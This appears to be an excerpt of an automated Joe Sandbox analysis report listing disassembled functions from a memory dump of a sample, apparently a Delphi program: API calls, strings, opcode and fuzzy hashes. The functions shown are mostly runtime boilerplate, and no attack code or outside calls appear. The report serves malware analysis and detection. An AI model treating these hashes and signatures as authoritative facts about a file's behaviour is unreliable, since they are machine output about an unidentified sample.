                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C61
                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C35C87
                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C35C97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                      • API String ID: 1599918012-2375825460
                                                                                                                                      • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                      • Instruction ID: 18aff27ba3743db6a78e03715d7cd98376cd24fbc11cbb677c50e9bc12903d73
                                                                                                                                      • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                      • Instruction Fuzzy Hash: A73175B1E4061C2EEB27D6B49C45FDF77AD5B483C4F4409E19608E6181DAB59B448F90
                                                                                                                                      Function 02C37F5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C37F7D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                      • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                                                                                      • Instruction ID: be1162ad70d05aeffa53843912ac61d50f429e3aa98824f0eb6888e549830ee2
                                                                                                                                      • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                                                                                      • Instruction Fuzzy Hash: 7B1100B5A00209AF9B45CF99C8809AFF7F9EFCC304B14C569A508EB254E6319A018B90
                                                                                                                                      Function 02C3A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                                      • Instruction ID: 701bb2006f4be330538aad2cbe770005720bcfe37d69d1d8c2f80f538844e828
                                                                                                                                      • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                                      • Instruction Fuzzy Hash: CAE0D836B0021417D32AA5585C81DF6736D975D350F00457EFD45C7340EEB09E504AE9
                                                                                                                                      Function 02C3B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetVersionExA.KERNEL32(?,02C5C106,00000000,02C5C11E), ref: 02C3B722
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Version
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                      • Opcode ID: 9771e481a7a12c1b394b7d01eaa127ad4498f2439e35468054a4d544600864ba
                                                                                                                                      • Instruction ID: b0c020ed1ad7d87273d7693bdbfaac2e3a19eaed013e9fc8b35982966ff94a33
                                                                                                                                      • Opcode Fuzzy Hash: 9771e481a7a12c1b394b7d01eaa127ad4498f2439e35468054a4d544600864ba
                                                                                                                                      • Instruction Fuzzy Hash: 29F067749043118FC340DF28E140B1577E0FB89780F004E29E89AD7394E734C894CF22
                                                                                                                                      Function 02C3A798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C3BDFA,00000000,02C3C013,?,?,00000000,00000000), ref: 02C3A7AB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                                      • Instruction ID: 0106d5c7b4377c791a55646fa71b5cf6641cfa73fcb163b8b4065e6a6e4ab849
                                                                                                                                      • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                                      • Instruction Fuzzy Hash: 8ED05EA630E2603AA221515B2D94D7B5AECCACA7A1F10883EF588C6200D2108C0696F5
                                                                                                                                      Function 02C39194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LocalTime
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 481472006-0
                                                                                                                                      • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                                      • Instruction ID: 6a3f0b49b3756694bb45afe7565b9605cf0478c1eddf758dcc0d2d86d12d190e
                                                                                                                                      • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                                      • Instruction Fuzzy Hash: C0A01200404C2011854037190C0213530545800620FD40F4068F8402D0ED2D012050D7
                                                                                                                                      Function 02C320C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                      Function 02C3D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C3D225
                                                                                                                                        • Part of subcall function 02C3D1F0: GetProcAddress.KERNEL32(00000000), ref: 02C3D209
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                      • API String ID: 1646373207-1918263038
                                                                                                                                      • Opcode ID: df1780d8f233bd0e2375a19f1fbfee2bda45ab606748063b2b77e621913492bd
                                                                                                                                      • Instruction ID: c24f663985a5dc77e2bf1794ed6d0e58acae5d214342ba88c32febb08589afa5
                                                                                                                                      • Opcode Fuzzy Hash: df1780d8f233bd0e2375a19f1fbfee2bda45ab606748063b2b77e621913492bd
                                                                                                                                      • Instruction Fuzzy Hash: CA4185E2A842451B560BBB6DB80562B77DED7887303604E1BF00BDB741DE70BC619E2E
                                                                                                                                      Function 02C46E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C46E66
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02C46E77
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02C46E87
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02C46E97
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02C46EA7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02C46EB7
                                                                                                                                      • GetProcAddress.KERNEL32 ref: 02C46EC7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                      • API String ID: 667068680-2233174745
                                                                                                                                      • Opcode ID: 56ef41d53e155f5adbd5fbfc0f923600398b86faf0ea1236fbdecf517f937905
                                                                                                                                      • Instruction ID: 34d061422730ae6157ac254c0fb5cf384a844038c092ce172a686a146096bc8d
                                                                                                                                      • Opcode Fuzzy Hash: 56ef41d53e155f5adbd5fbfc0f923600398b86faf0ea1236fbdecf517f937905
                                                                                                                                      • Instruction Fuzzy Hash: E5F050F0AC97617EB7027F709C81A2727ADD5126843301F75744375906DEB5C8905F58
                                                                                                                                      Function 02C32530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C328CE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                      • API String ID: 2030045667-32948583
                                                                                                                                      • Opcode ID: a5dee624524b3f5d99dcc2d844bc33b2797caee168042d78904afab0fa4ff3a9
                                                                                                                                      • Instruction ID: e573db63e52b7b03b177eb9d1b60ac012df56a1abb4cd1c64146d4a077aef95c
                                                                                                                                      • Opcode Fuzzy Hash: a5dee624524b3f5d99dcc2d844bc33b2797caee168042d78904afab0fa4ff3a9
                                                                                                                                      • Instruction Fuzzy Hash: 27A1F571A043648BDF22AA2CCC84BD8B7E5EF49710F1448E5DD49AB285CB758EC5CF52
                                                                                                                                      Function 02C3252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • , xrefs: 02C32814
                                                                                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C32849
                                                                                                                                      • Unexpected Memory Leak, xrefs: 02C328C0
                                                                                                                                      • An unexpected memory leak has occurred. , xrefs: 02C32690
                                                                                                                                      • 7, xrefs: 02C326A1
                                                                                                                                      • bytes: , xrefs: 02C3275D
                                                                                                                                      • The unexpected small block leaks are:, xrefs: 02C32707
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                      • API String ID: 0-2723507874
                                                                                                                                      • Opcode ID: 157947c73daba52892748dd5605d20d75a43c68aab7666b1a85317f765978836
                                                                                                                                      • Instruction ID: e22bf5e7b982656a3e23495aa1217416575ae53db824be097956c6ac1be365e3
                                                                                                                                      • Opcode Fuzzy Hash: 157947c73daba52892748dd5605d20d75a43c68aab7666b1a85317f765978836
                                                                                                                                      • Instruction Fuzzy Hash: 9F71B270A042A88EDF22AA2CCC84BD8BAE5EF49714F1049E5D949DB281DB754EC5CF52
                                                                                                                                      Function 02C3BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,02C3C013,?,?,00000000,00000000), ref: 02C3BD7E
                                                                                                                                        • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                      • API String ID: 4232894706-2493093252
                                                                                                                                      • Opcode ID: 861ad22df59363ef884cbac07851a77428a2f54de1a1e74c3168a57167e75e7a
                                                                                                                                      • Instruction ID: 8c1e94507107cfbf273ab92916c6f7d5518f2e9ad493569cc09aa237c3a99e82
                                                                                                                                      • Opcode Fuzzy Hash: 861ad22df59363ef884cbac07851a77428a2f54de1a1e74c3168a57167e75e7a
                                                                                                                                      • Instruction Fuzzy Hash: 6C615075B001489BDB06EBA8D890ADF77BB9F89300F509C36E101EB345CA35DE19AF95
                                                                                                                                      Function 02C4AE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AE40
                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02C4AE57
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AEEB
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 02C4AEF7
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02C4AF0B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Read$HandleModule
                                                                                                                                      • String ID: KernelBase$LoadLibraryExA
                                                                                                                                      • API String ID: 2226866862-113032527
                                                                                                                                      • Opcode ID: 469647effdcb5a4c9c8449ffca4d2cea159ffd91ad4e877a51b1a0cd641daab5
                                                                                                                                      • Instruction ID: edf032919297586bd7d717067362e5e6d86901877d21212c8d66a9c233398816
                                                                                                                                      • Opcode Fuzzy Hash: 469647effdcb5a4c9c8449ffca4d2cea159ffd91ad4e877a51b1a0cd641daab5
                                                                                                                                      • Instruction Fuzzy Hash: F731B5B2A80305BBEB20DF69CC85F5B77B8AF05364F104614FA54EB280DB71E950DBA4
                                                                                                                                      Function 02C3432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8,?,?,02C5D7A8,02C3655D,02C5C30D), ref: 02C34365
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8,?,?,02C5D7A8,02C3655D,02C5C30D), ref: 02C3436B
                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,02C343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?,02C907C8), ref: 02C34380
                                                                                                                                      • WriteFile.KERNEL32(00000000,000000F5,02C343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C343F3,?,?), ref: 02C34386
                                                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C343A4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
